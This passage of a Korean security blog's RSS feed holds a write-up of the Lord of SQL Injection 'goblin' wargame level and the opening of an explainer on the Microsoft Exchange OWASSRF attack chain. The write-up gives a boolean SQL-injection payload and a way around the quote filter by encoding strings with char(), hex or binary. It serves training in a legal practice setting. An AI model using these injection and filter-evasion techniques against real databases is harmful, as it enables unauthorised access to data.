      <description>&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #ee2323;&quot;&gt;허용받지&amp;nbsp;않은&amp;nbsp;서비스&amp;nbsp;대상으로&amp;nbsp;해킹을&amp;nbsp;시도하는&amp;nbsp;행위는&amp;nbsp;범죄&amp;nbsp;행위입니다.&lt;/span&gt;&amp;nbsp;해킹을&amp;nbsp;시도할&amp;nbsp;때에&amp;nbsp;발생하는&amp;nbsp;법적인&amp;nbsp;책임은&amp;nbsp;그것을&amp;nbsp;행한&amp;nbsp;사용자에게&amp;nbsp;있다는&amp;nbsp;것을&amp;nbsp;명심하시기&amp;nbsp;바랍니다.&lt;/b&gt; &lt;br /&gt;&lt;br /&gt;조금 더&amp;nbsp;구체적인&amp;nbsp;내용들은&amp;nbsp;&lt;a href=&quot;https://securitycode.tistory.com/261&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;[LOS]&amp;nbsp;Lord&amp;nbsp;of&amp;nbsp;the&amp;nbsp;SQL&amp;nbsp;Injection&amp;nbsp;-&amp;nbsp;gremlin&lt;/a&gt; 문제를 풀면서 작성해 두었고, 빠진 부분이나 필요한 부분들에 대해서는 조금씩 추가하면서 작성 하도록 하겠습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;575&quot; data-origin-height=&quot;314&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/dRyv1B/btrUP0d5TRd/wa9HmWUWKiOWb4pkSdqemk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/dRyv1B/btrUP0d5TRd/wa9HmWUWKiOWb4pkSdqemk/img.png&quot; data-alt=&quot;goblin&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/dRyv1B/btrUP0d5TRd/wa9HmWUWKiOWb4pkSdqemk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FdRyv1B%2FbtrUP0d5TRd%2Fwa9HmWUWKiOWb4pkSdqemk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;600&quot; height=&quot;328&quot; data-origin-width=&quot;575&quot; data-origin-height=&quot;314&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;goblin&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;b&gt;[LOS]&amp;nbsp;Lord&amp;nbsp;of&amp;nbsp;the&amp;nbsp;SQL&amp;nbsp;Injection&amp;nbsp;-&amp;nbsp;goblin&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;preg_match : porb _ . ( ) 필터링이 되어 있고 i 옵션을 통하여 대소문자를 구분하지 않음 no='필터링값'이 있을 경우 &quot;No Hack ~_~&quot; 문구를 출력합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;preg_match : ' &quot; ` 필터링이 되어 있고 i 옵션을 통하여 대소문자를 구분하지 않음 no='필터링값'이 있을 경우 &quot;No Quotes ~_~&quot; 문구를 출력합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #0000bb;&quot;&gt;$query&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;color: #007700;&quot;&gt;=&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;color: #dd0000;&quot;&gt;&quot;select&amp;nbsp;id&amp;nbsp;from&amp;nbsp;prob_goblin&amp;nbsp;where&amp;nbsp;id='guest'&amp;nbsp;and&amp;nbsp;no=&lt;/span&gt;&lt;span style=&quot;color: #007700;&quot;&gt;{&lt;/span&gt;&lt;span style=&quot;color: #0000bb;&quot;&gt;$_GET&lt;/span&gt;&lt;span style=&quot;color: #007700;&quot;&gt;[&lt;/span&gt;&lt;span style=&quot;color: #0000bb;&quot;&gt;no&lt;/span&gt;&lt;span style=&quot;color: #007700;&quot;&gt;]}&lt;/span&gt;&lt;span style=&quot;color: #dd0000;&quot;&gt;&quot;&lt;/span&gt;&lt;span style=&quot;color: #007700;&quot;&gt;;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #333333;&quot;&gt;쿼리문에서는 id 값은 'guest'로 고정되어 있고, no 변수에 입력되는 값만 GET으로 넘겨주는 것을 알 수 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #007700;&quot;&gt;if(&lt;/span&gt;&lt;span style=&quot;color: #0000bb;&quot;&gt;$result&lt;/span&gt;&lt;span style=&quot;color: #007700;&quot;&gt;[&lt;/span&gt;&lt;span style=&quot;color: #dd0000;&quot;&gt;'id'&lt;/span&gt;&lt;span style=&quot;color: #007700;&quot;&gt;])&amp;nbsp;echo&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;color: #dd0000;&quot;&gt;&quot;&amp;lt;h2&amp;gt;Hello&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;color: #007700;&quot;&gt;{&lt;/span&gt;&lt;span style=&quot;color: #0000bb;&quot;&gt;$result&lt;/span&gt;&lt;span style=&quot;color: #007700;&quot;&gt;[&lt;/span&gt;&lt;span style=&quot;color: #0000bb;&quot;&gt;id&lt;/span&gt;&lt;span style=&quot;color: #007700;&quot;&gt;]}&lt;/span&gt;&lt;span style=&quot;color: #dd0000;&quot;&gt;&amp;lt;/h2&amp;gt;&quot;&lt;/span&gt;&lt;span style=&quot;color: #007700;&quot;&gt;;&amp;nbsp;&lt;br /&gt;if(&lt;/span&gt;&lt;span style=&quot;color: #0000bb;&quot;&gt;$result&lt;/span&gt;&lt;span style=&quot;color: #007700;&quot;&gt;[&lt;/span&gt;&lt;span style=&quot;color: #dd0000;&quot;&gt;'id'&lt;/span&gt;&lt;span style=&quot;color: #007700;&quot;&gt;]&amp;nbsp;==&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;color: #dd0000;&quot;&gt;'admin'&lt;/span&gt;&lt;span style=&quot;color: #007700;&quot;&gt;)&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;color: #0000bb;&quot;&gt;solve&lt;/span&gt;&lt;span style=&quot;color: #007700;&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;color: #dd0000;&quot;&gt;&quot;goblin&quot;&lt;/span&gt;&lt;span style=&quot;color: #007700;&quot;&gt;);&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;검색된 쿼리 결과를 통하여 조건이 맞을 경우 id 값을 반환해 주고 있으며, 최종적으로 id가 'admin'일 경우 문제가 해결되는 것을 알 수 있습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;624&quot; data-origin-height=&quot;388&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bivNYC/btrUSzmymgE/fPyhvJc8Rmmd8JzWztKg00/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bivNYC/btrUSzmymgE/fPyhvJc8Rmmd8JzWztKg00/img.png&quot; data-alt=&quot;no=1 값 입력&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bivNYC/btrUSzmymgE/fPyhvJc8Rmmd8JzWztKg00/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbivNYC%2FbtrUSzmymgE%2FfPyhvJc8Rmmd8JzWztKg00%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;630&quot; height=&quot;392&quot; data-origin-width=&quot;624&quot; data-origin-height=&quot;388&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;no=1 값 입력&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;아무 생각 없이 no 변수에 1을 입력하였더니 Hello guest 문구가 출력되는 것을 확인할 수 있었습니다. 즉 id가 'guest'일 경우 no의 값은 1이라는 것을 알 수 있습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;조금 더 이해하기 쉽게 비박스 데이터 베이스를 통하여 예시를 들어 보도록 하겠습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;302&quot; data-origin-height=&quot;205&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/b1vqpX/btrUVaNq8hO/7N8bAm6kpO56jKfcsE1oFk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/b1vqpX/btrUVaNq8hO/7N8bAm6kpO56jKfcsE1oFk/img.png&quot; data-alt=&quot;bWAPP DB&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/b1vqpX/btrUVaNq8hO/7N8bAm6kpO56jKfcsE1oFk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fb1vqpX%2FbtrUVaNq8hO%2F7N8bAm6kpO56jKfcsE1oFk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;300&quot; height=&quot;204&quot; data-origin-width=&quot;302&quot; data-origin-height=&quot;205&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;bWAPP DB&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;bWAPP DB로 예를 들어 보면 여기서 bWAPP의 login 값은 LOS의 id, bWAPP id 값은 LOS의 no로 생각하시면 조금 더 이해가 되실 거라고 생각됩니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;revenue_unit_wrap&quot;&gt;
  &lt;div class=&quot;revenue_unit_item adsense responsive&quot;&gt;
    &lt;div class=&quot;revenue_unit_info&quot;&gt;반응형&lt;/div&gt;
    &lt;script src=&quot;//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js&quot; async=&quot;async&quot;&gt;&lt;/script&gt;
    &lt;ins class=&quot;adsbygoogle&quot; style=&quot;display: block;&quot; data-ad-host=&quot;ca-host-pub-9691043933427338&quot; data-ad-client=&quot;ca-pub-1078460042237685&quot; data-ad-format=&quot;auto&quot;&gt;&lt;/ins&gt;
    &lt;script&gt;(adsbygoogle = window.adsbygoogle || []).push({});&lt;/script&gt;
  &lt;/div&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;그럼 다시 문제로 돌아와서 id='guest' and no=1이라는 것을 알았습니다. 그렇다면 'admin'도 다른 no값을 가지고 있다는 것을 추측할 수 있습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;723&quot; data-origin-height=&quot;439&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/W8kHJ/btrURpx094T/zeILs4lAqqqoKCKFfiCdD1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/W8kHJ/btrURpx094T/zeILs4lAqqqoKCKFfiCdD1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/W8kHJ/btrURpx094T/zeILs4lAqqqoKCKFfiCdD1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FW8kHJ%2FbtrURpx094T%2FzeILs4lAqqqoKCKFfiCdD1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;720&quot; height=&quot;437&quot; data-origin-width=&quot;723&quot; data-origin-height=&quot;439&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;?no=0 OR no=2&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;b&gt;select id from prob_goblin where id='guest' and no=0 OR no=2&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;연산은 and 연산부터 수행되기 때문에 id='guest'이고 no=0은 거짓이기 때문에 OR 연산을 수행하여 no=2의 값을 출력하게 됩니다. 즉 'admin'의 no 값은 2가 되게 됩니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;571&quot; data-origin-height=&quot;244&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/ne7r4/btrURkcqz1W/D8O9XpLZmhfqxI8Qe5h8gk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/ne7r4/btrURkcqz1W/D8O9XpLZmhfqxI8Qe5h8gk/img.png&quot; data-alt=&quot;bWAPP DB&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/ne7r4/btrURkcqz1W/D8O9XpLZmhfqxI8Qe5h8gk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fne7r4%2FbtrURkcqz1W%2FD8O9XpLZmhfqxI8Qe5h8gk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;570&quot; height=&quot;244&quot; data-origin-width=&quot;571&quot; data-origin-height=&quot;244&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;bWAPP DB&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;bWAPP DB로 예시를 들어 보겠습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;select login, id from heroes where login='neo' and id=1;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;heroes 테이블의 login, id 컬럼에서 login='neo' and id=1 값의 결과를 출력합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;select login, id from heroes where login='neo' and id=0 or id=2;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;heroes 테이블의 login, id 컬럼에서 login='neo' and id=0 값을 출력하였으나 조건에 맞지 않아 or 조건을 통하여 id=2의 값을 출력합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;해당 문제에서는 ' &quot; ` 필터링이 되어 문자를 입력하지 못하게 막고 있지만, char, hex, binary를 통하여 문자를 입력할 수도 있습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;416&quot; data-origin-height=&quot;465&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/KbAmp/btrUTYTYK0F/U2Wbht2qt59cCDSNVy6nE0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/KbAmp/btrUTYTYK0F/U2Wbht2qt59cCDSNVy6nE0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/KbAmp/btrUTYTYK0F/U2Wbht2qt59cCDSNVy6nE0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FKbAmp%2FbtrUTYTYK0F%2FU2Wbht2qt59cCDSNVy6nE0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;410&quot; height=&quot;458&quot; data-origin-width=&quot;416&quot; data-origin-height=&quot;465&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;10진수 - char(97,100,109,105,110)&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;16진수 - 0x61646D696E (16진수는 앞에 0x를 표기하여 줍니다.)&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;2진수 - 0b0110000101100100011011010110100101101110&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;867&quot; data-origin-height=&quot;434&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/6O765/btrURpSmlhh/0BGJYxSbIIdXxe6Sk2Z6gk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/6O765/btrURpSmlhh/0BGJYxSbIIdXxe6Sk2Z6gk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/6O765/btrURpSmlhh/0BGJYxSbIIdXxe6Sk2Z6gk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2F6O765%2FbtrURpSmlhh%2F0BGJYxSbIIdXxe6Sk2Z6gk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;750&quot; height=&quot;375&quot; data-origin-width=&quot;867&quot; data-origin-height=&quot;434&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;char를 이용하여 admin을 출력하였습니다. 이처럼 필터링된 문자열을 우회할 수 있는 방법도 있으니 참고하여 직접 테스트를 해보시기를 추천드립니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;참고&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;a href=&quot;https://ko.wikipedia.org/wiki/ASCII#%EC%B6%9C%EB%A0%A5_%EA%B0%80%EB%8A%A5_%EC%95%84%EC%8A%A4%ED%82%A4_%EB%AC%B8%EC%9E%90%ED%91%9C&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;https://ko.wikipedia.org/wiki/ASCII#%EC%B6%9C%EB%A0%A5_%EA%B0%80%EB%8A%A5_%EC%95%84%EC%8A%A4%ED%82%A4_%EB%AC%B8%EC%9E%90%ED%91%9C&lt;/a&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>Code::War Game/los.rubiya.kr</category>
      <category>lord of sql injection</category>
      <category>LORD OF SQL INJECTION GOBLIN</category>
      <category>Lord of SQLInjection</category>
      <category>Los</category>
      <category>sql injection</category>
      <author>태군 코드</author>
      <guid isPermaLink="true">https://securitycode.tistory.com/265</guid>
      <comments>https://securitycode.tistory.com/265#entry265comment</comments>
      <pubDate>Thu, 29 Dec 2022 15:09:47 +0900</pubDate>
    </item>
    <item>
      <title>Microsoft Exchange ProxyNotShell우회 OWASSRF 공격체인</title>
      <link>https://securitycode.tistory.com/264</link>
      <description>&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;span style=&quot;color: #ee2323;&quot;&gt;허용받지&amp;nbsp;않은&amp;nbsp;서비스&amp;nbsp;대상으로&amp;nbsp;해킹을&amp;nbsp;시도하는&amp;nbsp;행위는&amp;nbsp;범죄&amp;nbsp;행위입니다.&lt;/span&gt;&amp;nbsp;해킹을&amp;nbsp;시도할&amp;nbsp;때에&amp;nbsp;발생하는&amp;nbsp;법적인&amp;nbsp;책임은&amp;nbsp;그것을&amp;nbsp;행한&amp;nbsp;사용자에게&amp;nbsp;있다는&amp;nbsp;것을&amp;nbsp;명심하시기&amp;nbsp;바랍니다. &lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #333333;&quot;&gt;개요&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #333333;&quot;&gt;- 최근 OWA(Outlook Web Access)를 통해 원격 코드 실행(RCE)을 달성하기 위해 CVE-2022-41080 및 CVE-2022-41082로 구성된 새로운 익스플로잇 방법( OWASSRF라고 함)을 발견했습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #333333;&quot;&gt;- ProxyNotShell취약점 중 CVE-2022-41040이 아닌 CVE-2022-41080을 이용해 권한상승을 유발 합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #333333;&quot;&gt;*&amp;nbsp;ProxyNotShell&amp;nbsp;:&amp;nbsp;온프레미스&amp;nbsp;Exchange&amp;nbsp;서버에&amp;nbsp;원격&amp;nbsp;코드&amp;nbsp;실행을&amp;nbsp;일으키는&amp;nbsp;제로데이&amp;nbsp;취약점&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #333333;&quot;&gt;설명&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #333333;&quot;&gt;Autodiscover원격 Microsoft Exchange 서버에서 제공하는 서비스에 대해 클라이언트에 알리는 데 사용되는 끝점은 프런트엔드에 대한 인증된 요청을 사용하여 액세스 됩니다.&amp;nbsp; &lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333;&quot;&gt;CVE-2022-41040 경로 혼동(path confusion) 익스플로잇을 사용하여 액세스 하여 공격자가 임의 URL의 백엔드에 도달할 수 있도록 합니다. 이러한 유형의 취약점을 서버 측 요청 위조(SSRF)라고 합니다. ProxyNotShell의 경우 대상 백엔드 서비스는 원격 PowerShell 접근 시도 합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;730&quot; data-origin-height=&quot;90&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/FjTBg/btrUM5T45lR/H4BhLlOwgcVPrYI9xvlUOk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/FjTBg/btrUM5T45lR/H4BhLlOwgcVPrYI9xvlUOk/img.png&quot; data-alt=&quot;CVE-2022-41040 프론트엔드 요청&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/FjTBg/btrUM5T45lR/H4BhLlOwgcVPrYI9xvlUOk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FFjTBg%2FbtrUM5T45lR%2FH4BhLlOwgcVPrYI9xvlUOk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;730&quot; height=&quot;90&quot; data-origin-width=&quot;730&quot; data-origin-height=&quot;90&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;CVE-2022-41040 프론트엔드 요청&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;727&quot; data-origin-height=&quot;89&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/ByRrp/btrUOMmaYAh/x7W2lQNH7KhLbASzOJK2u1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/ByRrp/btrUOMmaYAh/x7W2lQNH7KhLbASzOJK2u1/img.png&quot; data-alt=&quot;CVE-2022-41040 백엔드 요청&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/ByRrp/btrUOMmaYAh/x7W2lQNH7KhLbASzOJK2u1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FByRrp%2FbtrUOMmaYAh%2Fx7W2lQNH7KhLbASzOJK2u1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;730&quot; height=&quot;89&quot; data-origin-width=&quot;727&quot; data-origin-height=&quot;89&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;CVE-2022-41040 백엔드 요청&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #333333;&quot;&gt;CVE-2022-41080&amp;nbsp;프런트엔드&amp;nbsp;요청의&amp;nbsp;경우&amp;nbsp;원격&amp;nbsp;PowerShell&amp;nbsp;HTTP&amp;nbsp;로그&amp;nbsp;의&amp;nbsp;사용자,&amp;nbsp;IP&amp;nbsp;주소&amp;nbsp;및&amp;nbsp;GUID를&amp;nbsp;Exchange&amp;nbsp;프런트엔드와&amp;nbsp;연관시켜&amp;nbsp;특정&amp;nbsp;OWA&amp;nbsp;URL에&amp;nbsp;대한&amp;nbsp;사서함&amp;nbsp;사용&amp;nbsp;요청을&amp;nbsp;악용하여&amp;nbsp;원격&amp;nbsp;Powershell에&amp;nbsp;접근&amp;nbsp;시도 &lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
